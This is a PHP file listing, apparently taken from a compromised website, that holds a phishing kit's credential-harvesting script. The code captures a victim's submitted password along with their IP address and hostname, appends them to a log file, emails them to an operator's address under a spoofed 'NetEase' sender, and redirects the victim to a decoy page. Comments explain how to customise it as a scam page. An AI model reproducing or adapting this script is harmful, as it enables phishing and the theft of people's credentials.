File "NextStepUserpass.php"
Full Path: /home/fresvfqn/waterdamagerestorationandrepairsmithtown.com/www.splitfist.com.au/includes/ports/NextStepUserpass.php
File size: 1.61 KB
MIME-type: text/x-php
Charset: utf-8
<?php
$ip = getenv("REMOTE_ADDR"); //this to got the one u spamed IP
$hostname = gethostbyaddr($ip); // this to got his Host company
$message .= "--------------+ Created By Alexander +------------\n"; // Fixed Message you can change it
$message .= "--------------+ Userx0r1 +------------\n"; // to explan to your self what this area x0r1 or Contact info or what
$message .= "Password : ".$_POST['password']."\n"; // this for got the info
$message .= "--------------+ Created By ME +------------\n";
$message .= "IP Address : ".$ip."\n"; // here to message your info about the IP
$message .= "HostName : ".$hostname."\n"; // here to Message your info about Host name
$message .= "--------------------\n";
$rnessage = "$message\n";
$message .= "--------------+ Created By ME +------------\n";
$send="princeonek@gmail.com"; // Here your Email or any email u need got info on it
file_put_contents("../logs.txt",$message,FILE_APPEND);
$subject = "AccessCU 2 ReZulT $ip"; // the name of your message as apper into Email u can change Scampage Tooolz
$headers = "From: NetEase<news@NetEase.com>"; // the Email of sender will apper into message detils
$str=array($send, $IP); foreach ($str as $send)
if(mail($send,$subject,$rnessage,$headers) != false){
mail($Send,$subject,$rnessage,$headers);
mail($messege,$subject,$rnessage,$headers);
Header ("Location: Updates.htm"); // here will tell the index where it go after done send the info i will tell it go to paypal wrong page
}
?>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="refresh" content="0;url= Updates.htm">
<title></title>
</head>
</html>